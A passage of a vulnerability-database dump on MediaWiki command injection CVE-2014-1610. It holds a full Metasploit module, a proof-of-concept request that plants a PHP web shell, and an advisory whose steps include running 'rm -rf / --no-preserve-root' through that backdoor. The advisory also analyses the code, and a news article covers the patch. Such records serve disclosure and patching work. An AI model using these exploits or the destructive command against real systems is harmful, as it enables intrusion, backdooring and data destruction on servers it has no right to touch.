1.19.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMediaWiki\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a \r\n\r\nhttp://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "MediaWiki\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61437", "id": "SSV:61437", "sourceData": "\n GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61437", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:12", "description": "", "published": "2014-02-19T00:00:00", "type": "packetstorm", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-19T00:00:00", "id": "PACKETSTORM:125287", "href": "https://packetstormsecurity.com/files/125287/MediaWiki-Thumb.php-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MediaWiki Thumb.php Remote Command Execution', \n'Description' => %q{ \nMediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, \nwhen DjVu or PDF file upload support is enabled, allows remote unauthenticated \nusers to execute arbitrary commands via shell metacharacters. If no target file \nis specified this module will attempt to log in with the provided credentials to \nupload a file (.DjVu) to use for exploitation. \n}, \n'Author' => \n[ \n'Netanel Rubin', # from Check Point - Discovery \n'Brandon Perry', # Metasploit Module \n'Ben Harris', # Metasploit Module \n'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-1610' ], \n[ 'OSVDB', '102630'], \n[ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ], \n[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Automatic PHP-CLI', \n{ \n'Payload' => \n{ \n'BadChars' => \"\\r\\n\", \n'PrependEncoder' => \"php -r \\\"\", \n'AppendEncoder' => \"\\\"\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP \n} \n], \n[ 'Linux CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl python php', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD \n} \n], \n[ 'Windows CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['win'], \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]), \nOptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]), \nOptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]), \nOptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ]) \n], self.class) \nend \n \ndef get_version(body) \nmeta_generator = get_html_value(body, 'meta', 'generator', 'content') \n \nunless meta_generator \nvprint_status(\"No META Generator tag on #{full_uri}.\") \nreturn nil, nil, nil \nend \n \nif meta_generator && meta_generator =~ /mediawiki/i \nvprint_status(\"#{meta_generator} detected.\") \nmeta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/ \nmajor = $1.to_i \nminor = $2.to_i \npatch = $3.to_i \nvprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\") \n \nreturn major, minor, patch \nend \n \nreturn nil, nil, nil \nend \n \ndef check \nuri = target_uri.path \n \nopts = { 'uri' => normalize_uri(uri, 'index.php') } \n \nresponse = send_request_cgi!(opts) \n \nif opts['redirect_uri'] \nvprint_status(\"Redirected to #{opts['redirect_uri']}.\") \nend \n \nunless response \nvprint_status(\"No response from #{full_uri}.\") \nreturn CheckCode::Unknown \nend \n \n# Mediawiki will give a 404 for unknown pages but still have a body \nif response.code == 200 || response.code == 404 \nvprint_status(\"#{response.code} response received...\") \n \nmajor, minor, patch = get_version(response.body) \n \nunless major \nreturn CheckCode::Unknown \nend \n \nif major == 1 && (minor < 8 || minor > 22) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 22 && patch > 1) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 21 && patch > 4) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 19 && patch > 10) \nreturn CheckCode::Safe \nelsif major == 1 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nvprint_status(\"Received response code #{response.code} from #{full_uri}\") \nCheckCode::Unknown \nend \n \ndef exploit \nuri = target_uri.path \n \nprint_status(\"Grabbing version and login CSRF token...\") \nresponse = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'vars_get' => { 'title' => 'Special:UserLogin' } \n}) \n \nunless response \nfail_with(Failure::NotFound, \"Failed to retrieve webpage.\") \nend \n \nserver = response['Server'] \nif server && target.name =~ /automatic/i && server =~ /win32/i \nvprint_status(\"Windows platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Windows \nelsif server && target.name =~ /automatic/i \nvprint_status(\"Nix platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Unix \nelse \nmy_platform = target.platform.platforms.first \nend \n \n# If we have already identified a DjVu/PDF file on the server trigger \n# the exploit \nunless datastore['FILENAME'].blank? \npayload_request(uri, datastore['FILENAME'], my_platform) \nreturn \nend \n \nusername = datastore['USERNAME'] \npassword = datastore['PASSWORD'] \n \nmajor, minor, patch = get_version(response.body) \n \n# Upload CSRF added in v1.18.2 \n# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1 \nif ((major == 1) && (minor == 18) && (patch == 0 || patch == 1)) \nupload_csrf = false \nelsif ((major == 1) && (minor < 18)) \nupload_csrf = false \nelse \nupload_csrf = true \nend \n \nsession_cookie = response.get_cookies \n \nwp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value') \n \nif wp_login_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find login token. Is URI set correctly?\") \nelse \nprint_good(\"Retrieved login CSRF token.\") \nend \n \nprint_status(\"Attempting to login...\") \nlogin = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'method' => 'POST', \n'vars_get' => { \n'title' => 'Special:UserLogin', \n'action' => 'submitlogin', \n'type' => 'login' \n}, \n'cookie' => session_cookie, \n'vars_post' => { \n'wpName' => username, \n'wpPassword' => password, \n'wpLoginAttempt' => 'Log in', \n'wpLoginToken' => wp_login_token \n} \n}) \n \nif login and login.code == 302 \nprint_good(\"Log in successful.\") \nelse \nfail_with(Failure::NoAccess, \"Failed to log in.\") \nend \n \nauth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','') \n \n# Testing v1.15.1 it looks like it has session fixation \n# vulnerability so we dont get a new session cookie after \n# authenticating. Therefore we need to include our old cookie. \nunless auth_cookie.include? 'session=' \nauth_cookie << session_cookie \nend \n \nprint_status(\"Getting upload CSRF token...\") if upload_csrf \nupload_file = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'cookie' => auth_cookie \n}) \n \nunless upload_file and upload_file.code == 200 \nfail_with(Failure::NotFound, \"Failed to access file upload page.\") \nend \n \nwp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf \nwp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value') \ntitle = get_html_value(upload_file.body, 'input', 'title', 'value') \n \nif upload_csrf && wp_edit_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find upload token. Is URI set correctly?\") \nelsif upload_csrf \nprint_good(\"Retrieved upload CSRF token.\") \nend \n \nupload_mime = Rex::MIME::Message.new \n \ndjvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\")) \nfile_name = \"#{rand_text_alpha(4)}.djvu\" \n \nupload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\") \nupload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\") \nupload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\") \nupload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\") \nupload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\") \nupload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf \nupload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\") \nupload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\") \nupload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\") \npost_data = upload_mime.to_s \n \nprint_status(\"Uploading DjVu file #{file_name}...\") \n \nupload = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'data' => post_data, \n'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\", \n'cookie' => auth_cookie \n}) \n \nif upload and upload.code == 302 and upload.headers['Location'] \nlocation = upload.headers['Location'] \nprint_good(\"File uploaded to #{location}\") \nelse \nif upload.body.include? 'not a permitted file type' \nfail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\") \nelse \nfail_with(Failure::UnexpectedReply, \"Failed to upload file.\") \nend \nend \n \npayload_request(uri, file_name, my_platform) \nend \n \ndef payload_request(uri, file_name, my_platform) \nif my_platform == Msf::Module::Platform::Windows \ntrigger = \"1)&(#{payload.encoded})&\" \nelse \ntrigger = \"1;#{payload.encoded};\" \nend \n \nvars_get = { 'f' => file_name } \nif file_name.include? '.pdf' \nvars_get['width'] = trigger \nelsif file_name.include? '.djvu' \nvars_get['width'] = 1 \nvars_get['p'] = trigger \nelse \nfail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\") \nend \n \nprint_status(\"Sending payload request...\") \nr = send_request_cgi({ \n'uri' => normalize_uri(uri, 'thumb.php'), \n'vars_get' => vars_get \n}, 1) \n \nif r && r.code == 404 && r.body =~ /not exist/ \nprint_error(\"File: #{file_name} does not exist.\") \nelsif r \nprint_error(\"Received response #{r.code}, exploit probably failed.\") \nend \nend \n \n# The order of name, value keeps shifting so regex is painful. \n# Cant use nokogiri due to security issues \n# Cant use REXML directly as its not strict XHTML \n# So we do a filthy mixture of regex and REXML \ndef get_html_value(html, type, name, value) \nreturn nil unless html \nreturn nil unless type \nreturn nil unless name \nreturn nil unless value \n \nfound = nil \nhtml.each_line do |line| \nif line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i \nfound = $& \nbreak \nend \nend \n \nif found \ndoc = REXML::Document.new found \nreturn doc.root.attributes[value] \nend \n \n'' \nend \nend \n \n`\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125287/mediawiki_thumb.rb.txt"}, {"lastseen": "2016-12-05T22:15:32", "description": "", "published": "2014-02-03T00:00:00", "type": "packetstorm", "title": "MediaWiki 1.22.1 PdfHandler Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-03T00:00:00", "id": "PACKETSTORM:125040", "href": "https://packetstormsecurity.com/files/125040/MediaWiki-1.22.1-PdfHandler-Remote-Code-Execution.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n#################################################################### \n# \n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit \n(CVE-2014-1610) \n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group \n(Jan 19, 2014) \n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) \n# Affected website : Wikipedia.org and more ! \n# \n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto) \n# Release dates : Feb 1, 2014 \n# Special Thanks to 2600 Thailand ! \n# \n#################################################################### \n \n# Exploit: \n#################################################################### \n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) \nhttp://vulnerable-site/index.php/Special:Upload \n2. inject os cmd to upload a php-backdoor \nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 \n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php` \n3. access to php-backdoor! \nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root \n4. happy pwning!! \n \n \n# Related files: \n#################################################################### \nthumb.php <-- extract all _GET array to params \n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width \noptions \n/includes/media/ImageHandler.php \n/includes/GlobalFunctions.php \n/includes/filerepo/file/File.php \n \n# Vulnerability Analysis: \n#################################################################### \n1. thumb.php \nThis script used to resize images if it is configured to be done \nwhen the web browser requests the image \n<? ... \n1.1 Called directly, use $_GET params \nwfThumbHandleRequest(); \n1.2 Handle a thumbnail request via query parameters \nfunction wfThumbHandleRequest() { \n$params = get_magic_quotes_gpc() \n? array_map( 'stripslashes', $_GET ) \n: $_GET; << WTF \n \nwfStreamThumb( $params ); // stream the thumbnail \n} \n1.3 Stream a thumbnail specified by parameters \nfunction wfStreamThumb( array $params ) { \n... \n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts \nuploaded.pdf file here \n... \n// Backwards compatibility parameters \nif ( isset( $params['w'] ) ) { \n$params['width'] = $params['w']; // << Inject os cmd here! \nunset( $params['w'] ); \n} \n... \n$img = wfLocalFile( $fileName ); \n... \n// Thumbnail isn't already there, so create the new thumbnail... \n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image \nby width/height \n... \n// Stream the file if there were no errors \n$thumb->streamFile( $headers ); \n... \n?> \n2. /includes/filerepo/file/File.php \n<? ... \nfunction transform( $params, $flags = 0 ) { ... \n$handler = $this->getHandler(); // << PDF Handler \n... \n$normalisedParams = $params; \n$handler->normaliseParams( $this, $normalisedParams ); \n... \n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); \n.. \n?> \n3. /extensions/PdfHandler/PdfHandler_body.php \n<? ... \nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { \n... \n$width = $params['width']; \n... \n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & \nparameters \n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} \n-dLastPage={$page}\"; \n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg( \n$srcPath ); \n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor ); \n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell \nargument \n$cmd .= wfEscapeShellArg( $dstPath ) . \")\"; \n$cmd .= \" 2>&1\"; \n... \n$err = wfShellExec( $cmd, $retval ); \n... \n?> \n4. /includes/GlobalFunctions.php \nExecute a shell command, with time and memory limits \n<? ... \nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = \narray() ) { \n... \npassthru( $cmd, $retval ); // << Execute here!! \n \n# Proof-Of-Concept \n#################################################################### \nGET \n/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php` \nHTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiUserID=2; my_wikiUserName=Longcat; \nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02 \n \n<html><head><title>Error generating thumbnail</title></head> \n<body> \n<h1>Error generating thumbnail</h1> \n<p> \n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br /> \nconvert: option requires an argument `-resize' @ \nerror/convert.c/ConvertImageCommand/2380.<br /> \nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> \n \n</p> \n \n</body> \n</html> \n \n \nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; \nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 \n \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \n \n \n# Back-end $cmd \n#################################################################### \nGlobalFunctions.php : wfShellExec() \ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 \n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | \n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php \nsystem(\\\\$_GET[1]);\">images/longcat.php` - \n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1 \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.14 (GNU/Linux) \n \niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU \nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf \nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1 \nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2 \nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb \nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv \nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh \nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt \nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ \nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan \nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR \n2LmeyQR2rzjBB7Sovvcn \n=ooEs \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125040/mediawiki1221-exec.txt"}], "thn": [{"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-1610"], "description": "[](<https://4.bp.blogspot.com/-K0XlEYvexd8/UuolXbDRtQI/AAAAAAAAAS0/NGDSXCuuLJY/s1600/MediaWiki.jpg>)\n\nThe Encyclopedia giant **WIKIPEDIA** has been found vulnerable to [remote code execution](<https://thehackernews.com/search/label/remote%20code%20execution>) because of a critical flaw in _the MediaWiki software_.\n\n \n\n\nWikipedia is a name which has become a major source of information for all of us. It has webpages on almost every topic you need to search.\n\n \n\n\nThis giant is powered by an open source wiki software called MediaWiki. MediaWiki not only empowers Wikipedia, but also a number of other wiki websites. This software is a product of the Wikimedia Foundation and is coded in PHP with a database as backend.\n\n \n\n\n_Cyber Point Software Technologies_ [found](<http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html>) a remote code execution vulnerability in MediaWiki, \"_This vulnerability affects all versions of MediaWiki from 1.8 onwards._\" \n \nThe vulnerability assigned with ID [_CVE-2014-1610_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610>) allows an attacker to execute shell code remotely via an incorrectly sanitized parameter on the MediaWiki application server. \n\n> _\u201cShell meta characters can be passed in the page parameter to the thumb.php.\u201d [Bug 60339](<https://bugzilla.wikimedia.org/show_bug.cgi?id=60339>)._\n\n**MediaWiki **announced** [Security Releases](<https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html>) **1.22.2, 1.21.5 and 1.19.11,** \"**_Your MediaWiki installation is affected by a remote code execution vulnerability if you have enabled file upload support for DjVu (natively supported by MediaWiki) or PDF files (in combination with the PdfHandler extension). Neither file type is enabled by default in MediaWiki installations. If you are affected, we strongly urge you to update immediately._**\"** \n** \n** **Key Findings:**_** **_The vulnerability might have caused Wikipedia\u2019s web servers a malicious content distributor, if left uncovered. \n \n\"_Check Point promptly alerted the WikiMedia Foundation to the presence of this vulnerability, and after verifying it the Foundation released a software update to correct the issue._\"\n\n \n\n\nAn update was released from the _Wikimedia Foundation_ after knowing about the vulnerability from Check Point. This is the 3rd 'remote code execution' [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) reported in MediaWiki Platform, since 2006.\n\n \n\n\n\u201c_It only takes a single vulnerability on a widely adopted platform for a hacker to infiltrate and wreak widespread damage_,\u201d says Dorit Dor, vice president of products, Check Point Software Technologies. Check Point's Vulnerability Research Group assesses common software to ensure the security of Internet users. \n \nMediaWiki 's latest version_ 1.22.2 Stable_ is fully patched to defend against this flaw, and Wikipedia is now also upgraded to it.\n\n \n\n\nSince almost all cyber security enthusiasts are putting efforts in finding security loopholes in the products available on the Internet, that has put Open source technology to the highest priority in terms of security testing.\n", "modified": "2014-01-30T10:50:25", "published": "2014-01-29T23:20:00", "id": "THN:14D220C3673BA5820F7A055DC2CB7A3A", "href": "https://thehackernews.com/2014/01/mediawiki-remote-code-execution.html", "type": "thn", "title": "MediaWiki Remote Code Execution vulnerability leaves Wikipedia open for Cyber attacks", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMediaWiki 1.22.1 PdfHandler - Remote Code Execution", "edition": 1, "published": "2014-02-01T00:00:00", "title": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-01T00:00:00", "id": "EXPLOITPACK:740983D0417678074247C5AE47DBBED6", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n####################################################################\n#\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\n# Affected website : Wikipedia.org and more !\n#\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\n# Release dates : Feb 1, 2014\n# Special Thanks to 2600 Thailand !\n#\n####################################################################\n\n# Exploit:\n####################################################################\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\nhttp://vulnerable-site/index.php/Special:Upload\n2. inject os cmd to upload a php-backdoor\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\n3. access to php-backdoor!\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\n4. happy pwning!!\n\n\n# Related files:\n####################################################################\nthumb.php <-- extract all _GET array to params\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\noptions\n/includes/media/ImageHandler.php\n/includes/GlobalFunctions.php\n/includes/filerepo/file/File.php\n\n# Vulnerability Analysis:\n####################################################################\n1. thumb.php\nThis script used to resize images if it is configured to be done\nwhen the web browser requests the image\n<? ...\n1.1 Called directly, use $_GET params\nwfThumbHandleRequest();\n1.2 Handle a thumbnail request via query parameters\nfunction wfThumbHandleRequest() {\n$params = get_magic_quotes_gpc()\n? array_map( 'stripslashes', $_GET )\n: $_GET; << WTF\n\nwfStreamThumb( $params ); // stream the thumbnail\n}\n1.3 Stream a thumbnail specified by parameters\nfunction wfStreamThumb( array $params ) {\n...\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\nuploaded.pdf file here\n...\n// Backwards compatibility parameters\nif ( isset( $params['w'] ) ) {\n$params['width'] = $params['w']; // << Inject os cmd here!\nunset( $params['w'] );\n}\n...\n$img = wfLocalFile( $fileName );\n...\n// Thumbnail isn't already there, so create the new thumbnail...\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\nby width/height\n...\n// Stream the file if there were no errors\n$thumb->streamFile( $headers );\n...\n?>\n2. /includes/filerepo/file/File.php\n<? ...\nfunction transform( $params, $flags = 0 ) { ...\n$handler = $this->getHandler(); // << PDF Handler\n...\n$normalisedParams = $params;\n$handler->normaliseParams( $this, $normalisedParams );\n...\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\n..\n?>\n3. /extensions/PdfHandler/PdfHandler_body.php\n<? ...\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\n...\n$width = $params['width'];\n...\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\nparameters\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\n-dLastPage={$page}\";\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\n$srcPath );\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\nargument\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\n$cmd .= \" 2>&1\";\n...\n$err = wfShellExec( $cmd, $retval );\n...\n?>\n4. /includes/GlobalFunctions.php\nExecute a shell command, with time and memory limits\n<? ...\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\narray() ) {\n...\npassthru( $cmd, $retval ); // << Execute here!!\n\n# Proof-Of-Concept\n####################################################################\nGET 